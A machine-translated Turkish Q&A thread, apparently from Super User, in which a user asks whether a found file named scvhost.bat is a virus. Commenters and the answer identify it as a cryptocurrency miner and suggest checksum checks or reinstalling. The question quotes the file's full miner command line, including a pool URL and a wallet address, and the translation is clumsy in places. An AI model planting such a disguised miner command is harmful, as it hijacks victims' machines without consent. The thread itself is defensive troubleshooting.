Bu scvhost.bat cryptonight ile bir virüs veya madenci mi?


17

Scvhost.bat adlı bu .bat dosyasını yeni buldum. Dosyada şu içerik vardı:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

Bu bir virüs (bilgi çalmak vb.) Mi yoksa dikilmiş bir madenci mi? Ben de kripto para birimlerinde dabble ve stratumyukarıdaki dosyada belirtilen bir para birimi olarak endişeliyim .


1
Bu gerçekten bir madenci gibi görünüyor. Kripto para birimlerini kendiniz kullandığınız düşünüldüğünde, benim de kullanıyorsanız, bunun benim için kullandığınız her şeyin bir parçası olmadığından emin olun. Bunu, .bat uzantısını başka bir adla yeniden adlandırarak ve yeniden başlattıktan sonra normalde benimkini yapıp yapamayacağınızı görebilirsiniz. Bu dosya hakkında garip buldum bir şey, scvhost hem yürütmek ne adı ve yarasa dosyası göz önüne alındığında normalde kendisini çağıracak olmasıdır. Normalde bu bir döngüye neden olur.
LPChip

2
@VirtualAnomaly Sanırım burada belirtilen sCVhost ile sVChost yanılıyorsunuz. Evet, svchost'un barındırma hizmetleri için mekanik olduğunun çok farkındayım.
LPChip

2
@LPChip Özür dilerim, haklısın, yanılmışım.
Sanal Anomali

2
Birisi çok fazla Starcraft oynadı, sanırım.
CodesInChaos

1
@lucidbrot SCV'ler, oyunun yarışlarından birinin (terrans) “kurucu” birimidir, bu durumda "Uzay İnşaat Aracı" anlamına gelir.
Aaron

Yanıtlar:


34

Özellikle parametre bir madencilik havuzunun URL'sini içerdiğinden, bu bir tür madencidir. Ancak, ikili dosyada ne olduğundan emin olmanız gerekir. Sisteminizde bulduğunuz ikili dosyanın sağlama toplamlarını madencinin geliştirme ekibi tarafından yapılan sürümlerle karşılaştırmak mantıklı olacaktır. Farklılarsa; Sisteminizin güvenli olmadığını düşünün.

Başka bir sorun, bu madenci hakkında bilgi sahibi olmanız (muhtemelen çok fazla CPU kullandığından), ancak sisteminizde başka neler olduğu hakkında hiçbir fikriniz yok. Bir davetsiz misafir madenciyi fırlatabilirse, başka şeyler de fırlatabilirlerdi. Yedeklemeden kurtarmak veya yine de yeni bir kurulum yapmak iyi bir fikir olabilir.

Sitemizi kullandığınızda şunları okuyup anladığınızı kabul etmiş olursunuz: Çerez Politikası ve Gizlilik Politikası.
Licensed under cc by-sa 3.0 with attribution required.